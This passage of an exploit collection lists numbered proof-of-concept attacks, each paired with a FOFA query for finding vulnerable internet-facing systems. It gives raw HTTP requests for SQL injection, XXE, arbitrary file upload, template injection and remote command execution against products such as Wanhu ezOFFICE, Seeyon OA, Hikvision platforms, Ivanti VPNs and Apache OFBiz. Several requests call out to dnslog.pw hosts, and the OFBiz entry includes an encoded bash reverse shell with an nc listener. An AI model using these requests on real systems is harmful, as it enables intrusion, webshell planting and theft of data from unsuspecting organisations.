Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 (Wanhu) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 (Wanhu) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 (Wanhu) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 (Newcapec) 掌上校园 campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

Then request:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x


77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then request:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 flow-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then request:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The EXP request is as follows; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 (DBAppSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

Then request /jfhatuwe.php

88. 安恒 (DBAppSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

Then request /astdfkhl.php

89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 (QAX) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then request:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qianxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <<ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <<ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
  "topicurl":"getSysStatusCfg",
  "token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
